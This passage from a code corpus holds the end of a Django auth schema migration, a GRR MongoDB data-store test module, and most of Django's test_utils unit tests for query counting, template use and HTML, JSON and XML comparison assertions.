            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'points': ('django.db.models.fields.IntegerField', [], {}),
            'type': ('django.db.models.fields.IntegerField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.CustomUser']", 'null': 'True'})
        },
        'auth.customuser': {
            'Meta': {'object_name': 'CustomUser', '_ormbases': ['auth.User']},
            'autoplay_preferences': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
            'award_points': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'biography': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'changes_notification': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
            'homepage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
            'preferred_language': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
            'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'}),
            'valid_email': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'})
        },
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.message': {
            'Meta': {'object_name': 'Message'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'message': ('django.db.models.fields.TextField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'_message_set'", 'to': "orm['auth.User']"})
        },
        'auth.permission': {
            'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'auth.userlanguage': {
            'Meta': {'unique_together': "(['user', 'language'],)", 'object_name': 'UserLanguage'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
            'proficiency': ('django.db.models.fields.IntegerField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.CustomUser']"})
        },
        'contenttypes.contenttype': {
            'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }

    complete_apps = ['auth']
| agpl-3.0 |
ksmaheshkumar/grr | lib/data_stores/mongo_data_store_test.py | 4 | 2079 | #!/usr/bin/env python
"""Tests the mongo data store abstraction."""
# pylint: disable=unused-import,g-bad-import-order
from grr.lib import server_plugins
# pylint: enable=unused-import,g-bad-import-order
from grr.lib import access_control
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import data_store_test
from grr.lib import flags
from grr.lib import test_lib
from grr.lib.data_stores import mongo_data_store
# pylint: mode=test
class MongoTestMixin(object):
    """A mixin for Mongo tests."""

    def InitDatastore(self):
        """Initializes the data store."""
        self.token = access_control.ACLToken(username="test",
                                             reason="Running tests")
        # Per-test-class database name keeps concurrent test runs isolated.
        config_lib.CONFIG.Set("Mongo.db_name", "grr_test_%s" %
                              self.__class__.__name__)
        data_store.DB = mongo_data_store.MongoDataStore()
        data_store.DB.security_manager = test_lib.MockSecurityManager()
        # Start every test from an empty store.
        self.DestroyDatastore()

    def DestroyDatastore(self):
        # Drop the collection.
        data_store.DB.db_handle.drop_collection(data_store.DB.latest_collection)
        data_store.DB.db_handle.drop_collection(data_store.DB.versioned_collection)

    def testCorrectDataStore(self):
        """Makes sure the correct implementation is tested."""
        self.assertTrue(isinstance(data_store.DB, mongo_data_store.MongoDataStore))
# Runs the full generic data store test suite against the Mongo backend
# supplied by MongoTestMixin.
class MongoDataStoreTest(MongoTestMixin, data_store_test._DataStoreTest):
    """Test the mongo data store abstraction."""
class MongoDataStoreBenchmarks(MongoTestMixin,
                               data_store_test.DataStoreBenchmarks):
  """Benchmark the mongo data store abstraction."""

  # Mongo is really slow at this, make sure that the test doesn't run too long.
  # 500 is standard for other data stores.
  files_per_dir = 50
# CSV-output variant of the benchmarks, again backed by the Mongo mixin.
class MongoDataStoreCSVBenchmarks(MongoTestMixin,
                                  data_store_test.DataStoreCSVBenchmarks):
  """Benchmark the mongo data store abstraction."""
def main(args):
  # Delegate to the shared GRR test entry point.
  test_lib.main(args)

if __name__ == "__main__":
  flags.StartMain(main)
| apache-2.0 |
Neamar/django | tests/test_utils/tests.py | 91 | 38793 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import warnings
from django.conf.urls import url
from django.contrib.staticfiles.finders import get_finder, get_finders
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.files.storage import default_storage
from django.core.urlresolvers import NoReverseMatch, reverse
from django.db import connection, router
from django.forms import EmailField, IntegerField
from django.http import HttpResponse
from django.template.loader import render_to_string
from django.test import (
SimpleTestCase, TestCase, ignore_warnings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.html import HTMLParseError, parse_html
from django.test.utils import CaptureQueriesContext, override_settings
from django.utils import six
from django.utils._os import abspathu
from django.utils.deprecation import RemovedInDjango20Warning
from .models import Car, Person, PossessedCar
from .views import empty_response
class SkippingTestCase(SimpleTestCase):
    """Verifies that skipUnlessDBFeature/skipIfDBFeature run or skip tests
    according to the database features they name."""

    def _assert_skipping(self, func, expected_exc):
        # We cannot simply use assertRaises because a SkipTest exception will go unnoticed
        try:
            func()
        except expected_exc:
            pass
        except Exception as e:
            self.fail("No %s exception should have been raised for %s." % (
                e.__class__.__name__, func.__name__))

    def test_skip_unless_db_feature(self):
        """
        Testing the django.test.skipUnlessDBFeature decorator.
        """
        # Total hack, but it works, just want an attribute that's always true.
        @skipUnlessDBFeature("__class__")
        def test_func():
            raise ValueError

        @skipUnlessDBFeature("notprovided")
        def test_func2():
            raise ValueError

        @skipUnlessDBFeature("__class__", "__class__")
        def test_func3():
            raise ValueError

        @skipUnlessDBFeature("__class__", "notprovided")
        def test_func4():
            raise ValueError

        # All named features present -> body runs (raises ValueError);
        # any feature missing -> decorator raises SkipTest instead.
        self._assert_skipping(test_func, ValueError)
        self._assert_skipping(test_func2, unittest.SkipTest)
        self._assert_skipping(test_func3, ValueError)
        self._assert_skipping(test_func4, unittest.SkipTest)

    def test_skip_if_db_feature(self):
        """
        Testing the django.test.skipIfDBFeature decorator.
        """
        @skipIfDBFeature("__class__")
        def test_func():
            raise ValueError

        @skipIfDBFeature("notprovided")
        def test_func2():
            raise ValueError

        @skipIfDBFeature("__class__", "__class__")
        def test_func3():
            raise ValueError

        @skipIfDBFeature("__class__", "notprovided")
        def test_func4():
            raise ValueError

        @skipIfDBFeature("notprovided", "notprovided")
        def test_func5():
            raise ValueError

        # skipIfDBFeature skips when ANY of the named features is present.
        self._assert_skipping(test_func, unittest.SkipTest)
        self._assert_skipping(test_func2, ValueError)
        self._assert_skipping(test_func3, unittest.SkipTest)
        self._assert_skipping(test_func4, unittest.SkipTest)
        self._assert_skipping(test_func5, ValueError)
class SkippingClassTestCase(SimpleTestCase):
    """Checks that the DB-feature skip decorators also work at class level."""

    def test_skip_class_unless_db_feature(self):
        @skipUnlessDBFeature("__class__")
        class NotSkippedTests(unittest.TestCase):
            def test_dummy(self):
                return

        @skipIfDBFeature("__class__")
        class SkippedTests(unittest.TestCase):
            def test_will_be_skipped(self):
                self.fail("We should never arrive here.")

        test_suite = unittest.TestSuite()
        test_suite.addTest(NotSkippedTests('test_dummy'))
        # Instantiating a skipped class must not raise eagerly; the skip
        # should only surface when the suite is run.
        try:
            test_suite.addTest(SkippedTests('test_will_be_skipped'))
        except unittest.SkipTest:
            self.fail("SkipTest should not be raised at this stage")
        result = unittest.TextTestRunner(stream=six.StringIO()).run(test_suite)
        # Both tests ran; exactly the decorated one was recorded as skipped.
        self.assertEqual(result.testsRun, 2)
        self.assertEqual(len(result.skipped), 1)
@override_settings(ROOT_URLCONF='test_utils.urls')
class AssertNumQueriesTests(TestCase):
    """Exercises assertNumQueries in its callable form, both with plain
    functions and with test-client requests."""

    def test_assert_num_queries(self):
        # Exceptions raised by the wrapped callable must propagate.
        def test_func():
            raise ValueError
        self.assertRaises(ValueError, self.assertNumQueries, 2, test_func)

    def test_assert_num_queries_with_client(self):
        person = Person.objects.create(name='test')

        # One GET -> one query, and the count resets between assertions.
        self.assertNumQueries(
            1,
            self.client.get,
            "/test_utils/get_person/%s/" % person.pk
        )

        self.assertNumQueries(
            1,
            self.client.get,
            "/test_utils/get_person/%s/" % person.pk
        )

        def test_func():
            self.client.get("/test_utils/get_person/%s/" % person.pk)
            self.client.get("/test_utils/get_person/%s/" % person.pk)
        self.assertNumQueries(2, test_func)
class AssertQuerysetEqualTests(TestCase):
    """Covers assertQuerysetEqual: ordering, transforms, and duplicate
    counting with ordered=False."""

    def setUp(self):
        self.p1 = Person.objects.create(name='p1')
        self.p2 = Person.objects.create(name='p2')

    def test_ordered(self):
        self.assertQuerysetEqual(
            Person.objects.all().order_by('name'),
            [repr(self.p1), repr(self.p2)]
        )

    def test_unordered(self):
        # With ordered=False the expected values may be in any order.
        self.assertQuerysetEqual(
            Person.objects.all().order_by('name'),
            [repr(self.p2), repr(self.p1)],
            ordered=False
        )

    def test_transform(self):
        # transform maps each object before comparison (here: to its pk).
        self.assertQuerysetEqual(
            Person.objects.all().order_by('name'),
            [self.p1.pk, self.p2.pk],
            transform=lambda x: x.pk
        )

    def test_undefined_order(self):
        # Using an unordered queryset with more than one ordered value
        # is an error.
        with self.assertRaises(ValueError):
            self.assertQuerysetEqual(
                Person.objects.all(),
                [repr(self.p1), repr(self.p2)]
            )
        # No error for one value.
        self.assertQuerysetEqual(
            Person.objects.filter(name='p1'),
            [repr(self.p1)]
        )

    def test_repeated_values(self):
        """
        Test that assertQuerysetEqual checks the number of appearance of each item
        when used with option ordered=False.
        """
        batmobile = Car.objects.create(name='Batmobile')
        k2000 = Car.objects.create(name='K 2000')
        PossessedCar.objects.bulk_create([
            PossessedCar(car=batmobile, belongs_to=self.p1),
            PossessedCar(car=batmobile, belongs_to=self.p1),
            PossessedCar(car=k2000, belongs_to=self.p1),
            PossessedCar(car=k2000, belongs_to=self.p1),
            PossessedCar(car=k2000, belongs_to=self.p1),
            PossessedCar(car=k2000, belongs_to=self.p1),
        ])
        # One of each is not enough: multiplicities must match too.
        with self.assertRaises(AssertionError):
            self.assertQuerysetEqual(
                self.p1.cars.all(),
                [repr(batmobile), repr(k2000)],
                ordered=False
            )
        self.assertQuerysetEqual(
            self.p1.cars.all(),
            [repr(batmobile)] * 2 + [repr(k2000)] * 4,
            ordered=False
        )
@override_settings(ROOT_URLCONF='test_utils.urls')
class CaptureQueriesContextManagerTests(TestCase):
    """Exercises CaptureQueriesContext: captured SQL, nesting, exception
    propagation, and use together with the test client."""

    def setUp(self):
        self.person_pk = six.text_type(Person.objects.create(name='test').pk)

    def test_simple(self):
        with CaptureQueriesContext(connection) as captured_queries:
            Person.objects.get(pk=self.person_pk)
        self.assertEqual(len(captured_queries), 1)
        self.assertIn(self.person_pk, captured_queries[0]['sql'])

        # No queries inside the block -> nothing captured.
        with CaptureQueriesContext(connection) as captured_queries:
            pass
        self.assertEqual(0, len(captured_queries))

    def test_within(self):
        # Captured queries are visible already inside the block.
        with CaptureQueriesContext(connection) as captured_queries:
            Person.objects.get(pk=self.person_pk)
            self.assertEqual(len(captured_queries), 1)
            self.assertIn(self.person_pk, captured_queries[0]['sql'])

    def test_nested(self):
        # The outer context also sees queries captured by the inner one.
        with CaptureQueriesContext(connection) as captured_queries:
            Person.objects.count()
            with CaptureQueriesContext(connection) as nested_captured_queries:
                Person.objects.count()
            self.assertEqual(1, len(nested_captured_queries))
        self.assertEqual(2, len(captured_queries))

    def test_failure(self):
        # Exceptions raised inside the block must propagate unchanged.
        with self.assertRaises(TypeError):
            with CaptureQueriesContext(connection):
                raise TypeError

    def test_with_client(self):
        with CaptureQueriesContext(connection) as captured_queries:
            self.client.get("/test_utils/get_person/%s/" % self.person_pk)
        self.assertEqual(len(captured_queries), 1)
        self.assertIn(self.person_pk, captured_queries[0]['sql'])

        with CaptureQueriesContext(connection) as captured_queries:
            self.client.get("/test_utils/get_person/%s/" % self.person_pk)
        self.assertEqual(len(captured_queries), 1)
        self.assertIn(self.person_pk, captured_queries[0]['sql'])

        with CaptureQueriesContext(connection) as captured_queries:
            self.client.get("/test_utils/get_person/%s/" % self.person_pk)
            self.client.get("/test_utils/get_person/%s/" % self.person_pk)
        self.assertEqual(len(captured_queries), 2)
        self.assertIn(self.person_pk, captured_queries[0]['sql'])
        self.assertIn(self.person_pk, captured_queries[1]['sql'])
@override_settings(ROOT_URLCONF='test_utils.urls')
class AssertNumQueriesContextManagerTests(TestCase):
    """Exercises assertNumQueries used as a context manager."""

    def test_simple(self):
        with self.assertNumQueries(0):
            pass

        with self.assertNumQueries(1):
            Person.objects.count()

        with self.assertNumQueries(2):
            Person.objects.count()
            Person.objects.count()

    def test_failure(self):
        # A wrong count fails with a message listing the captured queries.
        with self.assertRaises(AssertionError) as exc_info:
            with self.assertNumQueries(2):
                Person.objects.count()
        self.assertIn("1 queries executed, 2 expected", str(exc_info.exception))
        self.assertIn("Captured queries were", str(exc_info.exception))

        # Exceptions from the block propagate, regardless of the count.
        with self.assertRaises(TypeError):
            with self.assertNumQueries(4000):
                raise TypeError

    def test_with_client(self):
        person = Person.objects.create(name="test")

        with self.assertNumQueries(1):
            self.client.get("/test_utils/get_person/%s/" % person.pk)

        with self.assertNumQueries(1):
            self.client.get("/test_utils/get_person/%s/" % person.pk)

        with self.assertNumQueries(2):
            self.client.get("/test_utils/get_person/%s/" % person.pk)
            self.client.get("/test_utils/get_person/%s/" % person.pk)
@override_settings(ROOT_URLCONF='test_utils.urls')
class AssertTemplateUsedContextManagerTests(SimpleTestCase):
    """Exercises assertTemplateUsed/assertTemplateNotUsed as context
    managers: direct use, nesting, error messages, and misuse."""

    def test_usage(self):
        with self.assertTemplateUsed('template_used/base.html'):
            render_to_string('template_used/base.html')

        with self.assertTemplateUsed(template_name='template_used/base.html'):
            render_to_string('template_used/base.html')

        # Templates pulled in via {% include %} / {% extends %} also count.
        with self.assertTemplateUsed('template_used/base.html'):
            render_to_string('template_used/include.html')

        with self.assertTemplateUsed('template_used/base.html'):
            render_to_string('template_used/extends.html')

        with self.assertTemplateUsed('template_used/base.html'):
            render_to_string('template_used/base.html')
            render_to_string('template_used/base.html')

    def test_nested_usage(self):
        with self.assertTemplateUsed('template_used/base.html'):
            with self.assertTemplateUsed('template_used/include.html'):
                render_to_string('template_used/include.html')

        with self.assertTemplateUsed('template_used/extends.html'):
            with self.assertTemplateUsed('template_used/base.html'):
                render_to_string('template_used/extends.html')

        with self.assertTemplateUsed('template_used/base.html'):
            with self.assertTemplateUsed('template_used/alternative.html'):
                render_to_string('template_used/alternative.html')
            render_to_string('template_used/base.html')

        with self.assertTemplateUsed('template_used/base.html'):
            render_to_string('template_used/extends.html')
            with self.assertTemplateNotUsed('template_used/base.html'):
                render_to_string('template_used/alternative.html')
            render_to_string('template_used/base.html')

    def test_not_used(self):
        with self.assertTemplateNotUsed('template_used/base.html'):
            pass
        with self.assertTemplateNotUsed('template_used/alternative.html'):
            pass

    def test_error_message(self):
        with six.assertRaisesRegex(self, AssertionError, r'^template_used/base\.html'):
            with self.assertTemplateUsed('template_used/base.html'):
                pass

        with six.assertRaisesRegex(self, AssertionError, r'^template_used/base\.html'):
            with self.assertTemplateUsed(template_name='template_used/base.html'):
                pass

        # The failure message also lists the templates that WERE used.
        with six.assertRaisesRegex(self, AssertionError, r'^template_used/base\.html.*template_used/alternative\.html$'):
            with self.assertTemplateUsed('template_used/base.html'):
                render_to_string('template_used/alternative.html')

        with self.assertRaises(AssertionError) as cm:
            response = self.client.get('/test_utils/no_template_used/')
            self.assertTemplateUsed(response, 'template_used/base.html')
        self.assertEqual(cm.exception.args[0], "No templates used to render the response")

    def test_failure(self):
        # Calling without a template name is a usage error.
        with self.assertRaises(TypeError):
            with self.assertTemplateUsed():
                pass

        with self.assertRaises(AssertionError):
            with self.assertTemplateUsed(''):
                pass

        with self.assertRaises(AssertionError):
            with self.assertTemplateUsed(''):
                render_to_string('template_used/base.html')

        with self.assertRaises(AssertionError):
            with self.assertTemplateUsed(template_name=''):
                pass

        with self.assertRaises(AssertionError):
            with self.assertTemplateUsed('template_used/base.html'):
                render_to_string('template_used/alternative.html')

    def test_assert_used_on_http_response(self):
        # Only responses produced by the Django test client are supported.
        response = HttpResponse()
        error_msg = (
            'assertTemplateUsed() and assertTemplateNotUsed() are only '
            'usable on responses fetched using the Django test Client.'
        )
        with self.assertRaisesMessage(ValueError, error_msg):
            self.assertTemplateUsed(response, 'template.html')

        with self.assertRaisesMessage(ValueError, error_msg):
            self.assertTemplateNotUsed(response, 'template.html')
class HTMLEqualTests(SimpleTestCase):
    """Tests for assertHTMLEqual()/assertHTMLNotEqual() and the underlying
    parse_html() HTML normalizer."""

    def test_html_parser(self):
        """parse_html() builds a tree of elements and text children."""
        element = parse_html('<div><p>Hello</p></div>')
        self.assertEqual(len(element.children), 1)
        self.assertEqual(element.children[0].name, 'p')
        self.assertEqual(element.children[0].children[0], 'Hello')
        # Unclosed and attribute-only tags still parse without error.
        parse_html('<p>')
        parse_html('<p attr>')
        dom = parse_html('<p>foo')
        self.assertEqual(len(dom.children), 1)
        self.assertEqual(dom.name, 'p')
        self.assertEqual(dom[0], 'foo')

    def test_parse_html_in_script(self):
        """Content inside <script> is treated as raw text, not markup."""
        parse_html('<script>var a = "<p" + ">";</script>')
        parse_html('''
<script>
var js_sha_link='<p>***</p>';
</script>
''')
        # script content will be parsed to text
        dom = parse_html('''
<script><p>foo</p> '</scr'+'ipt>' <span>bar</span></script>
''')
        self.assertEqual(len(dom.children), 1)
        self.assertEqual(dom.children[0], "<p>foo</p> '</scr'+'ipt>' <span>bar</span>")

    def test_self_closing_tags(self):
        """Void elements compare equal with or without a trailing slash."""
        self_closing_tags = ('br', 'hr', 'input', 'img', 'meta', 'spacer',
                             'link', 'frame', 'base', 'col')
        for tag in self_closing_tags:
            dom = parse_html('<p>Hello <%s> world</p>' % tag)
            self.assertEqual(len(dom.children), 3)
            self.assertEqual(dom[0], 'Hello')
            self.assertEqual(dom[1].name, tag)
            self.assertEqual(dom[2], 'world')
            dom = parse_html('<p>Hello <%s /> world</p>' % tag)
            self.assertEqual(len(dom.children), 3)
            self.assertEqual(dom[0], 'Hello')
            self.assertEqual(dom[1].name, tag)
            self.assertEqual(dom[2], 'world')

    def test_simple_equal_html(self):
        """Whitespace differences and equivalent tag forms are ignored."""
        self.assertHTMLEqual('', '')
        self.assertHTMLEqual('<p></p>', '<p></p>')
        self.assertHTMLEqual('<p></p>', ' <p> </p> ')
        self.assertHTMLEqual(
            '<div><p>Hello</p></div>',
            '<div><p>Hello</p></div>')
        self.assertHTMLEqual(
            '<div><p>Hello</p></div>',
            '<div> <p>Hello</p> </div>')
        self.assertHTMLEqual(
            '<div>\n<p>Hello</p></div>',
            '<div><p>Hello</p></div>\n')
        self.assertHTMLEqual(
            '<div><p>Hello\nWorld !</p></div>',
            '<div><p>Hello World\n!</p></div>')
        self.assertHTMLEqual(
            '<div><p>Hello\nWorld !</p></div>',
            '<div><p>Hello World\n!</p></div>')
        self.assertHTMLEqual(
            '<p>Hello World !</p>',
            '<p>Hello World\n\n!</p>')
        self.assertHTMLEqual('<p> </p>', '<p></p>')
        self.assertHTMLEqual('<p/>', '<p></p>')
        self.assertHTMLEqual('<p />', '<p></p>')
        self.assertHTMLEqual('<input checked>', '<input checked="checked">')
        self.assertHTMLEqual('<p>Hello', '<p> Hello')
        self.assertHTMLEqual('<p>Hello</p>World', '<p>Hello</p> World')

    def test_ignore_comments(self):
        """HTML comments are stripped before comparison."""
        self.assertHTMLEqual(
            '<div>Hello<!-- this is a comment --> World!</div>',
            '<div>Hello World!</div>')

    def test_unequal_html(self):
        """Differences in text content or element structure are detected."""
        self.assertHTMLNotEqual('<p>Hello</p>', '<p>Hello!</p>')
        self.assertHTMLNotEqual('<p>foobar</p>', '<p>foo bar</p>')
        self.assertHTMLNotEqual('<p>foo bar</p>', '<p>foo bar</p>')
        self.assertHTMLNotEqual('<p>foo nbsp</p>', '<p>foo </p>')
        self.assertHTMLNotEqual('<p>foo #20</p>', '<p>foo </p>')
        self.assertHTMLNotEqual(
            '<p><span>Hello</span><span>World</span></p>',
            '<p><span>Hello</span>World</p>')
        self.assertHTMLNotEqual(
            '<p><span>Hello</span>World</p>',
            '<p><span>Hello</span><span>World</span></p>')

    def test_attributes(self):
        """Attribute order and quoting style are irrelevant; values matter."""
        self.assertHTMLEqual(
            '<input type="text" id="id_name" />',
            '<input id="id_name" type="text" />')
        self.assertHTMLEqual(
            '''<input type='text' id="id_name" />''',
            '<input id="id_name" type="text" />')
        self.assertHTMLNotEqual(
            '<input type="text" id="id_name" />',
            '<input type="password" id="id_name" />')

    def test_complex_examples(self):
        self.assertHTMLEqual(
            """<tr><th><label for="id_first_name">First name:</label></th>
<td><input type="text" name="first_name" value="John" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th>
<td><input type="text" id="id_last_name" name="last_name" value="Lennon" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th>
<td><input type="text" value="1940-10-9" name="birthday" id="id_birthday" /></td></tr>""",
            """
<tr><th>
<label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" value="John" id="id_first_name" />
</td></tr>
<tr><th>
<label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" value="Lennon" id="id_last_name" />
</td></tr>
<tr><th>
<label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" value="1940-10-9" id="id_birthday" />
</td></tr>
""")
        self.assertHTMLEqual(
            """<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet">
<title>Document</title>
<meta attribute="value">
</head>
<body>
<p>
This is a valid paragraph
<div> this is a div AFTER the p</div>
</body>
</html>""", """
<html>
<head>
<link rel="stylesheet">
<title>Document</title>
<meta attribute="value">
</head>
<body>
<p> This is a valid paragraph
<!-- browsers would close the p tag here -->
<div> this is a div AFTER the p</div>
</p> <!-- this is invalid HTML parsing, but it should make no
difference in most cases -->
</body>
</html>""")

    def test_html_contain(self):
        # equal html contains each other
        dom1 = parse_html('<p>foo')
        dom2 = parse_html('<p>foo</p>')
        self.assertIn(dom1, dom2)
        self.assertIn(dom2, dom1)
        dom2 = parse_html('<div><p>foo</p></div>')
        self.assertIn(dom1, dom2)
        self.assertNotIn(dom2, dom1)
        # Plain strings are matched against text content, not raw markup.
        self.assertNotIn('<p>foo</p>', dom2)
        self.assertIn('foo', dom2)
        # when a root element is used ...
        dom1 = parse_html('<p>foo</p><p>bar</p>')
        dom2 = parse_html('<p>foo</p><p>bar</p>')
        self.assertIn(dom1, dom2)
        dom1 = parse_html('<p>foo</p>')
        self.assertIn(dom1, dom2)
        dom1 = parse_html('<p>bar</p>')
        self.assertIn(dom1, dom2)

    def test_count(self):
        # equal html contains each other one time
        dom1 = parse_html('<p>foo')
        dom2 = parse_html('<p>foo</p>')
        self.assertEqual(dom1.count(dom2), 1)
        self.assertEqual(dom2.count(dom1), 1)
        dom2 = parse_html('<p>foo</p><p>bar</p>')
        self.assertEqual(dom2.count(dom1), 1)
        dom2 = parse_html('<p>foo foo</p><p>foo</p>')
        self.assertEqual(dom2.count('foo'), 3)
        # Tag names, attribute names and attribute values don't count as
        # text matches.
        dom2 = parse_html('<p class="bar">foo</p>')
        self.assertEqual(dom2.count('bar'), 0)
        self.assertEqual(dom2.count('class'), 0)
        self.assertEqual(dom2.count('p'), 0)
        self.assertEqual(dom2.count('o'), 2)
        dom2 = parse_html('<p>foo</p><p>foo</p>')
        self.assertEqual(dom2.count(dom1), 2)
        dom2 = parse_html('<div><p>foo<input type=""></p><p>foo</p></div>')
        self.assertEqual(dom2.count(dom1), 1)
        dom2 = parse_html('<div><div><p>foo</p></div></div>')
        self.assertEqual(dom2.count(dom1), 1)
        dom2 = parse_html('<p>foo<p>foo</p></p>')
        self.assertEqual(dom2.count(dom1), 1)
        dom2 = parse_html('<p>foo<p>bar</p></p>')
        self.assertEqual(dom2.count(dom1), 0)

    def test_parsing_errors(self):
        with self.assertRaises(AssertionError):
            self.assertHTMLEqual('<p>', '')
        with self.assertRaises(AssertionError):
            self.assertHTMLEqual('', '<p>')
        # A stray closing tag is a parse error, not an assertion failure.
        with self.assertRaises(HTMLParseError):
            parse_html('</p>')

    def test_contains_html(self):
        response = HttpResponse('''<body>
This is a form: <form action="" method="get">
<input type="text" name="Hello" />
</form></body>''')
        self.assertNotContains(response, "<input name='Hello' type='text'>")
        self.assertContains(response, '<form action="" method="get">')
        # html=True switches to semantic HTML comparison.
        self.assertContains(response, "<input name='Hello' type='text'>", html=True)
        self.assertNotContains(response, '<form action="" method="get">', html=True)
        invalid_response = HttpResponse('''<body <bad>>''')
        with self.assertRaises(AssertionError):
            self.assertContains(invalid_response, '<p></p>')
        with self.assertRaises(AssertionError):
            self.assertContains(response, '<p "whats" that>')

    def test_unicode_handling(self):
        """Non-ASCII text survives the HTML comparison round-trip."""
        response = HttpResponse('<p class="help">Some help text for the title (with unicode ŠĐĆŽćžšđ)</p>')
        self.assertContains(response, '<p class="help">Some help text for the title (with unicode ŠĐĆŽćžšđ)</p>', html=True)
class JSONEqualTests(SimpleTestCase):
    """Tests for assertJSONEqual()/assertJSONNotEqual(): key order must not
    matter, and malformed JSON on either side must fail the assertion."""

    def test_simple_equal(self):
        left = '{"attr1": "foo", "attr2":"baz"}'
        right = '{"attr1": "foo", "attr2":"baz"}'
        self.assertJSONEqual(left, right)

    def test_simple_equal_unordered(self):
        # Identical content with keys in a different order is still equal.
        left = '{"attr1": "foo", "attr2":"baz"}'
        right = '{"attr2":"baz", "attr1": "foo"}'
        self.assertJSONEqual(left, right)

    def test_simple_equal_raise(self):
        left = '{"attr1": "foo", "attr2":"baz"}'
        right = '{"attr2":"baz"}'
        with self.assertRaises(AssertionError):
            self.assertJSONEqual(left, right)

    def test_equal_parsing_errors(self):
        broken = '{"attr1": "foo, "attr2":"baz"}'
        wellformed = '{"attr1": "foo", "attr2":"baz"}'
        # Malformed JSON on either side must raise, not compare as text.
        with self.assertRaises(AssertionError):
            self.assertJSONEqual(broken, wellformed)
        with self.assertRaises(AssertionError):
            self.assertJSONEqual(wellformed, broken)

    def test_simple_not_equal(self):
        left = '{"attr1": "foo", "attr2":"baz"}'
        right = '{"attr2":"baz"}'
        self.assertJSONNotEqual(left, right)

    def test_simple_not_equal_raise(self):
        left = '{"attr1": "foo", "attr2":"baz"}'
        right = '{"attr1": "foo", "attr2":"baz"}'
        with self.assertRaises(AssertionError):
            self.assertJSONNotEqual(left, right)

    def test_not_equal_parsing_errors(self):
        broken = '{"attr1": "foo, "attr2":"baz"}'
        wellformed = '{"attr1": "foo", "attr2":"baz"}'
        with self.assertRaises(AssertionError):
            self.assertJSONNotEqual(broken, wellformed)
        with self.assertRaises(AssertionError):
            self.assertJSONNotEqual(wellformed, broken)
class XMLEqualTests(SimpleTestCase):
    """Tests for assertXMLEqual()/assertXMLNotEqual()."""

    def test_simple_equal(self):
        xml1 = "<elem attr1='a' attr2='b' />"
        xml2 = "<elem attr1='a' attr2='b' />"
        self.assertXMLEqual(xml1, xml2)

    def test_simple_equal_unordered(self):
        # Attribute order is irrelevant for XML equality.
        xml1 = "<elem attr1='a' attr2='b' />"
        xml2 = "<elem attr2='b' attr1='a' />"
        self.assertXMLEqual(xml1, xml2)

    def test_simple_equal_raise(self):
        xml1 = "<elem attr1='a' />"
        xml2 = "<elem attr2='b' attr1='a' />"
